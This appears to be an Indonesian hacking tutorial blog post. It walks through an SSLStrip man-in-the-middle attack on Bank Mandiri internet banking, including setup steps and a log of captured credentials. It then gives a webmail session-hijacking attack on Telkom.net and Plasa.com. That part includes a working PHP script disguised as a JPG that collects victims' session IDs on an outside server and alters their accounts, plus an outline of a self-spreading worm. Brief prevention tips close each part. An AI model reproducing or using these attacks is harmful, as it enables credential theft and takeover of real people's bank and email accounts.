    • Menggunakan javascript untuk load halaman https.
    Attacking HTTP, not HTTPS
    Sebelumnya sudah saya jelaskan bahwa https adalah protokol yang sangat secure sehingga tidak bisa diserang dengan serangan mitm. Namun mengingat kenyataan bahwa kebanyakan orang mengakses https melalui http, maka attacker memiliki peluang untuk menyerang ketika pengunjung masih berada dalam protokol http.
    SSLStrip adalah tool untuk melakukan mitm attack pada protokol http  (bukan HTTPS), dengan maksud untuk menyerang situs-situs yang dilindungi dengan https. SSLStrip sebagai “the person in the middle”, akan mencegah peralihan dari http ke https dengan secara aktif mengubah response dari server sehingga pengunjung akan tetap berada dalam protokol http.
    Mari kita lihat beberapa cara peralihan dari http ke https, saya tambahkan cara SSLStrip mencegah peralihan itu:
    • Memberikan link menuju URL https: SSLStrip akan mengubah link berawalan https menjadi http. Sehingga yang muncul di browser korban bukan link ke https melainkan link ke http.
    • Memberikan response redirect ke URL https: SSLStrip akan mengubah header Location dari URL berawalan https menjadi http.
    • Menggunakan META tag auto refresh ke URL https: SSLStrip akan mengubah url https menjadi http.
    • Menggunakan javascript untuk load halaman https: SSLStrip akan mengubah url https menjadi http.
    Untuk lebih jelasnya berikut adalah gambar yang menunjukkan salah satu cara kerja SSLStrip mencegah korban beralih dari http ke https.
    Opening Bank Front Page
    Opening Bank Front Page
    Pada gambar di atas korban mengakses web server bank dengan URL http://bank/. Request tidak secara langsung dikirim ke web server, namun melalui SSLStrip dulu. SSLStrip meneruskan request tersebut ke web server. Kemudian web server menjawab dengan memberikan html berisi link ke URL https://bank/login/ kepada SSLStrip. Sebelum response html diterima oleh browser, SSLStrip mengubah response tersebut dengan mengubah URL https menjadi http biasa sehingga HTML yang diterima di browser korban berisi link ke URL http://bank/login/ bukan https://bank/login/.
    Opening login page
    Opening login page
    Korban mengklik link pada halaman yang muncul browsernya, tentu saja link ini bukan ke https://bank/login/ melainkan ke http://bank/login/. Dengan cara ini browser tetap dalam protokol http bukan dalam protokol https seperti seharusnya, dengan kata lain SSLStrip berhasil mencegah browser beralih ke protokol https. Request ke http://bank/login/ tersebut dikirimkan ke SSLStrip. Kemudian SSLStrip tidak meneruskan request tersebut ke http://bank/login/, melainkan membuat request baru ke https://bank/login/. Kemudian web server mengirimkan response dari response tersebut ke SSLStrip. Seperti biasanya SSLStrip akan mengubah response dari server tersebut untuk mencegah peralihan ke https. Response yang telah diubah ini kemudian dikirimkan ke browser korban sehingga korban tetap melihat halaman yang sama persis seperti ketika dia membuka https://bank/login/. Dengan tampilan yang sama persis ini, korban mengira sedang membuka https://bank/login/, padahal sebenarnya dia sedang membuka http://bank/login/. Perhatikan bahwa koneksi antara browser dengan SSLStrip adalah dalam http biasa, sedangkan dari SSLStrip ke web server dalam https.
    submit username and password
    submit username and password
    Setelah muncul halaman login dan korban mengira sedang membuka https://bank/login, kemudian korban memasukkan username dan password dan mengklik tombol Login. Browser akan membuat POST request ke http://bank/login/ yang diterima oleh SSLStrip. Karena protokolnya adalah http, maka SSLStrip dengan mudah bisa membaca username dan password yang dimasukkan korban. SSLStrip kemudian akan mengirimkan username dan password korban degan POST request ke https://bank/login/.  Seperti biasa jawaban dari webserver akan dimodifikasi dulu seperlunya oleh SSLStrip sebelum dikirimkan ke browser korban.
    Perhatikan bahwa korban sejak awal hingga login mengakses situs dengan http, sedangkan SSLStrip di tengah-tengah membuat koneksi https ke web server yang sebenarnya. Jadi walaupun browser mengakses dengan http, namun response yang diterima browser berasal dari koneksi https yang dibuat oleh SSLStrip.
    Case Study: Mandiri Internet Banking
    Mari kita coba trik di atas dengan contoh kasus pada situs internet banking Mandiri. Karena ini hanya contoh, saya tidak menggunakan teknik ARP Spoofing untuk melakukan MITM attack yang sesungguhnya. Saya sengaja mengubah setting browser saya agar menggunakan proxy, yaitu SSLStrip. Dalam website SSLStrip, disebutkan seharusnya cara untuk melakukan MITM attack dengan SSLStrip adalah:
    • Setting komputer agar bisa melakukan forwarding paket
    • Setting iptables untuk mengarahkan traffic HTTP ke SSLStrip
    • Jalankan SSLStrip
    • Gunakan ARPSpoof untuk meyakinkan jaringan bahwa traffic harus dikirimkan melalui komputer yang menjalankan SSLStrip.
    Dalam contoh ini saya tidak melakukan ARPSpoofing, namun saya menggunakan SSLStrip sebagai proxy yang saya setting dalam browser saya. Sehingga setiap traffic http yang dilakukan browser saya akan dikirimkan melalui SSLStrip sebagai man in the middle.
    Saya menjalankan SSLStrip di linux dengan IP address 192.168.0.10. Cara menjalankannya mudah sekali, cukup jalankan perintah: python sslstrip.py -l portnumber . Kemudian pada browser saya setting untuk menggunakan proxy 192.168.0.10 dan port sesuai dengan port sslstrip. Untuk lebih jelasnya, perhatikan gambar di bawah ini:
    setting up SSLStrip as proxy in IE
    setting up SSLStrip as proxy in IE
    Setelah semuanya siap, mari kita coba melakukan serangan mitm. Pada skenario ini, korban akan login ke Mandiri IB tidak dengan mengetikkan https://ib.bankmandiri.co.id, karena korban hanya hafal bankmandiri.co.id saja maka korban langsung mengetikkan bankmandiri.co.id (tanpa diawali www atau http://). Secara default browser akan menganggap korban menghendaki koneksi dengan protokol http, bukan https. Request http tersebut dikirimkan melalui SSLStrip sebagai man in the middle, dan berikut adalah response yang diterima di browser korban. Sebagai pembanding saya juga berikan gambar screenshot halaman depan bank mandiri yang asli (tidak dimodifikasi sslstrip).
    bank mandiri front page modified by sslstrip
    bank mandiri front page modified by sslstrip
    real mandiri front page (not modified)
    real mandiri front page (not modified)
    Login ke Mandiri IB dilakukan dengan mengklik tombol Login di halaman depan bank mandiri. Login tersebut sebenarnya adalah link ke URL https, namun SSLStrip mengubahnya menjadi http agar korban tidak beralih ke modus https. Berikutnya korban akan mengklik tombol Login, sehingga browser akan mengakses URL http://ib.bankmandiri.co.id (bukan https://). Berikut adalah gambar screenshot halaman login Mandiri IB yang telah dimodifikasi sslstrip dan yang masih asli. Kedua gambar di bawah ini sangat mirip, perbedaannya hanya pada penggunaan awalan http:// dan https://. Saya yakin kebanyakan orang tidak akan menyadari bahwa dia sedang menggunakan http biasa, bukan https.
    Mandiri IB login page modified by sslstrip
    Mandiri IB login page modified by sslstrip
    real login page, https version and not modified
    real login page, https version and not modified
    Berikutnya setelah bertemu dengan halaman login, korban akan dengan senang hati memasukkan username dan password. Request tersebut dikirimkan dalam request POST http (bukan https) ke sslstrip. Karena POST dikirim melalui http, maka sslstrip bisa dengan mudah menyimpan username dan password korban.Berikut ini adalah log dari sslstrip yang menangkap username dan password Mandiri IB.
    1
    2
    3
    
    2009-05-06 12:00:43,339 Sending header: content-type: application/x-www-form-urlencoded
    2009-05-06 12:00:43,339 Sending header: proxy-connection: Keep-Alive
    2009-05-06 12:00:43,339 POST Data (ib.bankmandiri.co.id): action=result&userID=sensordong&password=rahasiabangetsensor&image.x=79&image.y=20
    Setelah itu sslstrip akan mengirimkan username dan password korban dalam POST request ke URL https (ini adalah url submit yang asli). Response yang diberikan oleh webserver Mandiri IB akan dimodifikasi seperlunya dan dikembalikan ke browser korban. Bila login berhasil, maka korban akan melihat tampilan seperti gambar dibawah ini, sebagai pembanding saya juga sertakan gambar bila menggunakan protokol https.
    login success page in http mode, modified by sslstrip
    login success page in http mode, modified by sslstrip
    real login success page, https mode, not modified
    real login success page, https mode, not modified
    Seperti pada halaman login, halaman setelah login berhasil juga sama persis walaupun menggunakan protokol http. Korban tidak akan menyadari bahwa dia sedang menggunakan http, bukannya https karena tampilannya memang tidak ada bedanya.
    Tips Pencegahan
    Serangan mitm dengan sslstrip ini dilakukan dengan memanfaatkan kemalasan pengguna untuk langsung menggunakan https. Pengguna yang malas memilih untuk menggunakan http biasa dan berharap di-redirect ke url https otomatis atau menemukan link ke url https. Padahal pada saat pengguna menggunakan http biasa itulah pengguna berpotensi terkena serangan mitm. Bila pengguna langsung menggunakan https, maka pengguna akan aman dan terbebas dari serangan mitm. Jadi mulai sekarang biasakanlah mengetikkan https:// di URL anda bila ingin mengakses situs yang sensitif.

    Hacking Email Telkom.net dan Plasa.com

    Telkom.net dan Plasa.com adalah fasilitas email gratis yang diberikan oleh PT Telkom. Pengguna email telkomnet dan plasacom patut waswas, karena amat mudah untuk menghack email di sana. Hanya dengan membuka sebuah email yang telah dirancang khusus oleh attacker, email anda bisa menjadi milik attacker. Dalam artikel ini saya akan tunjukkan apa kelemahannya, bagaimana cara mengexploitasi kelemahan itu dan tentu saja bagaimana cara agar terhindar dari serangan itu.

    Webmail Session Hijacking
    Teknik hacking email dalam artikel ini adalah dengan cara hijacking session. Oleh karena itu teknik ini hanya bisa dilakukan pada webmail telkom.net dan plasa.com, pengguna telkom.net dan plasa.com yang menggunakan Outlook/Thunderbird tidak rentan terhadap serangan ini.
    Karena http adalah protokol yang stateless, sedangkan untuk membuat session server harus bisa memantau state user, maka digunakanlah session ID sebagai kunci atau penanda suatu session. Bila sessionID diketahui attacker, maka attacker bisa menguasai session korban. Orang lain, siapapun yang membawa sessionID anda, akan dianggap oleh server sebagai anda. Hijacking session adalah usaha untuk mendapatkan session ID korban, dengan cara predicting, capturing, atau fixating session ID.
    SessionID diberikan oleh server dan harus dikembalikan lagi oleh browser (client) setiap kali membuat request. Mekanisme penyimpanan dan pengiriman session ID bisa dilakukan dengan dua cara:
    1. Session Cookie: Session ID diberikan server dalam bentuk cookie dan disimpan oleh browser. Setiap browser melakukan request, cookie tersebut akan dikembalikan ke server lagi sebagai bukti bahwa user tersebut adalah masih orang yang sama.
    2. URL Rewriting: Server menyisipkan session ID dalam halaman html yang dikirimkan ke browser. Session ID tersebut dimasukkan dalam bentuk URL di tag html tertentu seperti link (tag A). Contohnya bila URL link aslinya adalah http://www.somesite.com/inbox.php Oleh server link tersebut akan disisipkan sessionID menjadi:
      <A href="http://www.somesite.com/inbox.php?PHPSESSID=xxxxxxxxx">INBOX</A>
      Dengan cara ini setiap kali user mengklik link tersebut, maka sessionID juga akan dikirim ke server sebagai bukti bahwa user tersebut adalah pengguna session yang sah.
    SessionID paling aman disimpan dan dikirim kembali ke server dalam bentuk cookie, apalagi bila cookie tersebut diamankan dengan bit secure atau httponly (baca: protecting cookie with httponly ). Kemungkinan serangan yang bisa dilancarkan untuk mencuri cookie adalah dengan XSS attack dan sniffing attack, kedua jenis serangan itu bisa dicegah dengan bit secure dan httponly.
    Bila cookie telah diamankan dengan secure bit, maka cookie tersebut tidak bisa dicuri dengan sniffing karena cookie hanya dikirim melalui https, cookie tersebut juga tidak bisa dicuri dengan serangan XSS karena akses javascript terhadap cookie telah ditutup. Bila cookie hanya dilindungi dengan httponly, maka cookie itu aman dari serangan XSS, namun rentan sniffing bila cookie dikirimkan melalui http biasa.
    Berbeda dengan cookie, menyimpan Session ID dalam URL sangatlah berbahaya, karena URL mudah dilihat, dikopi dan disimpan dalam bookmark, log file dan sebagainya. Selain itu sessionID juga bisa bocor ke tempat lain melalui header Referer. Sebab header Referer bertugas membawa URL dimana sebuah request dilakukan. Bila dalam suatu halaman terjadi request untuk mengambil gambar, maka header Referer akan mengandung URL dari halaman tersebut. Dalam artikel ini saya akan menggunakan jurus header Referer untuk membajak session webmail Telkom.net dan Plasa.com. Bagi pemilik situs, tentu sering melihat header ini dengan program statistic seperti Awstats untuk melihat pengunjung situs berasal dari situs mana saja.
    telkom.net URL
    telkom.net URL

    plasa.com URL
    plasa.com URL
    SessionID webmail Telkom.net dan Plasa.com disimpan pada URL sehingga memudahkan pembajakan session. Mari kita lihat bagaimana bentuk URL webmail telkom.net dan plasa.com:
    http://mail.telkom.net/Session/206017-7vY8EVuJF2935NV9Fhzl-kmbcuww/mailbox.wssp?Mailbox=INBOX&amp;
    http://mail1.plasa.com/Session/70174-k2O8e3vcnJEFxmxWYpOX-kmbcuwc/mailbox.wssp?Mailbox=INBOX&amp;
    Stealing SessionID from Referer Header
    Session ID pada URL telkom.net dan plasa.com disisipkan setelah /Session/ hingga karakter / (slash). Sekarang bagaimana caranya attacker bisa mengetahui URL yang sedang dibuka korban di browsernya? Di awal saya sudah menyebutkan sekilas tentang header request yang bernama Referer. Tugas dari header ini adalah mengirimkan URL halaman yang melakukan request. Agar lebih jelasnya mari kita lihat sebuah contoh.
    Ketika pengunjung sedang membuka halaman dengan URL:
    http://mail.telkom.net/Session/235581-9w3zNaNskYc1v7ln5DDJ-kmbcuww/Mailbox.wssp?Mailbox=INBOX
    Kemudian ketika terjadi request ke sebuah file image:
    http://mail.telkom.net/Session/235581-9w3zNaNskYc1v7ln5DDJ-kmbcuww/batal.gif
    Maka pada request GET tersebut akan ada header seperti di bawah ini:
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    
    GET /Session/235581-9w3zNaNskYc1v7ln5DDJ-kmbcuww/batal.gif HTTP/1.1
    Host: mail.telkom.net
    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 GTB5 ImageShackToolbar/5.0.0
    Accept: image/png,image/*;q=0.8,*/*;q=0.5
    Accept-Language: en-us,en;q=0.5
    Accept-Encoding: gzip,deflate
    Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
    Keep-Alive: 300
    Connection: keep-alive
    Referer: http://mail.telkom.net/Session/235581-9w3zNaNskYc1v7ln5DDJ-kmbcuww/mailbox.wssp?Mailbox=INBOX&
    Cache-Control: max-age=0
    Pada baris ke-10 terdapat header Referer yang menunjukkan bahwa request tersebut terjadi ketika kepada user sedang berada di URL tersebut. Karena URL yang direquest adalah http://mail.telkom.net/Session/235581-9w3zNaNskYc1v7ln5DDJ-kmbcuww/batal.gif, maka web server mail.telkom.net tempat file batal.gif tersebut berada, dapat mengetahui URL ketika request tersebut terjadi. Sekarang bayangkan apa yang terjadi bila request tersebut bukan mendownload image dari mail.telkom.net, tapi dari server www.evilhackersite.com/image.jpg. Web server di www.evilhackersite.com tentu akan mendapatkan URL tempat terjadinya request dari header Referer. Dan karena URL tersebut mengandung Session ID, maka dengan mudah attacker akan membajak session anda.
    Attack Scenario
    Webmail telkom.net dan plasa.com menggunakan URL sebagai mekanisme pertukaran session ID. Attacker bisa menjebak korban untuk membuka sebuah email yang mengandung gambar yang berlokasi di server attacker. Tag IMG tersebut akan membuat browser korban melakukan request ke server attacker, dengan tentu saja mengirimkan URL korban dalam header Referer. Dengan mengetahui session ID korban, attacker dengan mudah menguasai account webmail korban.
    Preparing the Script
    Sebelum bisa melakukan serangan, yang pertama harus dilakukan adalah menyiapkan server side script sebagai target request untuk menangkap SessionID korban. Server side script ini akan di-”masking” sebagai file JPG dengan menggunakan mod_rewrite Apache (.htaccess). Server side script yang dimasking sebagai file JPG inilah yang akan dimasukkan dalam tag IMG dalam email yang dibaca korban. Bila korban membaca email attacker, maka akan terjadi request ke server side script itu, sehingga attacker bisa mendapatkan session ID korban dan menguasai emailnya.
    URL yang akan kita jadikan tujuan request adalah: http://www.ilmuhacking.com/mylab/image.jpg yang sebenarnya adalah masking untuk server side script http://www.ilmuhacking.com/mylab/checkmail.php. Dengan menggunakan mod_rewrite Apache dan settings .htacess berikut ini masking checkmail.php menjadi image.jpg bisa dilakukan:
    1
    2
    3
    
    RewriteEngine On
    RewriteBase /
    RewriteRule mylab/image.jpg mylab/checkmail.php
    Berikutnya saya harus menyiapkan file checkmail.php. Tugas dari script php itu adalah mendapatkan session ID kemudian langsung membajak session korban bermodalkan session ID tersebut.
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    
    <?php
    // Ambil header Referer
    $ref = $_SERVER["HTTP_REFERER"];
    $telkomnet = false;
    $plasacom = false;
    $width = 468;
    $height = 100;
    if (strpos($ref,"telkom.net")>-1) {
     $telkomnet = true;
    }
    if (strpos($ref,"plasa.com")>-1) {
     $plasacom = true;
    }
    if ($telkomnet===false && $plasacom===false) {
            exit();
    }
     
    $file = fopen("daftarkorban.txt","a");
    $url_tokens = parse_url($ref);
    $host = $url_tokens["host"];
    $tokens = explode("/",$ref);
    $sessid = $tokens[4];
    fwrite($file,"######\n");
    fwrite($file,"REFERER:".$_SERVER["HTTP_REFERER"]."\n");
    fwrite($file,"SESSID:".$sessid."\n");
     
    $urlhost = "http://$host/Session/$sessid/mailbox.wssp?Mailbox=INBOX&";
    $inboxhtml = file_get_contents($urlhost);
     
    preg_match('/<title>(.*?)<\/title>/i', $inboxhtml, $matches);
    $title=$matches[1];
    $email = $title;
    $pos = strpos($title," ");
    if ($pos > -1) {
    $email = substr($title,0,$pos);
    }
     
    fwrite($file,"KORBAN:".$email."\n");
    fwrite($file,"******\n");
    fclose($file);
     
    $image = ImageCreate($width, $height);
    $white = ImageColorAllocate($image, 255, 255, 255);
    $black = ImageColorAllocate($image, 0, 0, 0);
    $grey = ImageColorAllocate($image, 204, 204, 204);
    ImageFill($image, 0, 0, $black);
    ImageString($image, 3, 15, 5, $sessid, $white);
    ImageString($image, 3, 25, 25, $email, $white);
     
    // Writing Signature...
    $url = "http://mail.telkom.net/Session/$sessid/settings.wssp";
    if ($plasacom==true) {
     $url = "http://mail1.plasa.com/Session/$sessid/settings1.wssp";
    }
    $old_settings = file_get_contents($url);
    preg_match('/<textarea(.*?)>(.*?)<\/textarea>/i', $old_settings, $matches);
    $oldsig = $matches[2];
     
    $data = array();
    $data["UserFrom"] = $email;
    $newsig = "[YOUR EMAIL HAS BEEN HACKED]".$oldsig;
    $data["Signature"] = $newsig;
    $data["Update"] = "Update";
     
    $response = doPost($url,$data);
    if ((strpos($response,"Updated")>-1 && $telkomnet==true) || $plasacom==true) {
            ImageString($image, 3, 35, 50, "Signature anda berhasil diganti menjadi:" , $white);
            ImageString($image, 3, 45, 65, $newsig , $white);
    }
    header("Content-Type: image/jpeg");
    ImageJpeg($image);
    ImageDestroy($image);
     
    function doPost($url,$data) {
            $ch = curl_init();
            curl_setopt($ch, CURLOPT_URL, $url);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
            curl_setopt($ch, CURLOPT_POST, 1);
            curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
            $response = curl_exec($ch);
            if(curl_errno($ch))
            {
                    $response = curl_error($ch);
            }
            curl_close($ch);
            return $response;
    }
    ?>
    Cara kerja script di atas adalah: Pada baris ke-3 isi header Referer diambil. Kemudian dibuat dan dibuka file daftarkorban.txt. File ini adalah log yang menyimpan daftar korban. Pada baris ke-22, session ID diambil dari header referer. Setelah session ID didapatkan kini script bisa mengubah signature korban, dengan cara mengirimkan POST request ke http://mail.telkom.net/Session/[SESSIONID_KORBAN]/settings.wssp, perhatikan baris ke-65. Setelah mengubah signature korban, pada baris ke-66 sampai baris ke-72, script membuat image dengan pesan “Signature anda berhasil diganti menjadi:”.
    Launch The Attack
    Oke, kini semua persiapan sudah siap. Kini saatnya kita melancarkan serangan dengan mengirimkan email html yang mengandung tag IMG. Dalam contoh attacker adalah rizki.wicaksono@telkom.net dan korban adalah rizki.wicaksono@plasa.com. Ingat ini hanya contoh, dalam kenyataannya attacker bisa menggunakan email apapun, bahkan email palsu (anonymous). Perhatikan gambar berikut ini yang menunjukan bagaimana email yang berisi jebakan dibuat dan ditujukan untuk korban.
    compose attack email
    compose attack email
    Dalam gambar tersebut email diisi dengan tag HTML IMG. Perhatikan bahwa saya bisa saja membuat image tersebut invisible dengan memberikan atribut width dan src 0. Dengan membuat image menjadi invisible, korban tidak akan menyadari bahwa emailnya telah dibajak. Tapi untuk contoh saya membiarkan gambar berukuran besar. Berikut ini adalah isi tanda tangan (signature) email korban sebelum email dibuka.
    signature1
    Dan gambar berikut adalah gambar ketika email attacker tiba.
    email attacker tiba
    email attacker tiba
    Dan gambar berikut adalah gambar ketika email attacker dibuka oleh korban. Pada gambar tersebut terlihat bahwa session id korban dan pesan bahwa signature korban berubah tertulis dalam file image.jpg.
    victim open email and his session hijacked instantly
    victim open email and his session hijacked instantly
    Pada saat korban membuka email dari attacker, pada saat itu juga attacker menguasai penuh account email korban. Dalam contoh artikel ini attacker mengubah signature korban dengan menambahkan string [YOUR EMAIL HAS BEEN HACKED]. Berikut ini adalah gambar signature korban setelah korban membuka email attacker.
    signature2
    Worm Attack: More Dangerous Scenario
    Skenario serangan yang lebih berbahaya adalah bila attacker mengeksploitasi kelemahan ini untuk menciptakan worm. Ingat bahwa ketika attacker mendapatkan session ID, pada saat itu attacker memiliki power yang setara dengan korban. Dengan session korban, attacker bisa mengirimkan email serangan yang sama ke calon korban lain yang ada di dalam daftar buku alamat korban. Begitu teman korban membuka email itu, maka session dia juga dalam genggaman attacker dan dia juga akan menyebarkan serangan ke teman-temannya. Hal ini akan memicu reaksi berantai yang berbahaya.
    Sulitkah membuat worm seperti itu? Tidak sulit kok, mudah sekali. Semua itu tidak lebih dari kombinasi request GET dan POST dengan berbekal session ID korban. Attacker harus membaca phone book dengan mengirim request HTTP (GET/POST) dengan session ID korban. Setelah itu attacker akan mengirimkan email serangan ke teman-teman korban juga dengan melakukan request HTTP dengan session ID korban. Begitu seterusnya. Tidak sulit bukan, apalagi buat orang yang sudah sering memprogram.
    Tips Menghindari Serangan
    Karena serangan ini dilakukan dengan membajak session web, maka serangan ini hanya bisa dilakukan bila korban membaca email telkom.net dan plasa.com dengan webmail. Jadi agar terhindar dari serangan ini, gunakanlah akses POP3 atau IMAP untuk membaca email. Dengan menggunakan email client non-web seperti Thunderbird dan Outlook anda akan aman dari serangan ini.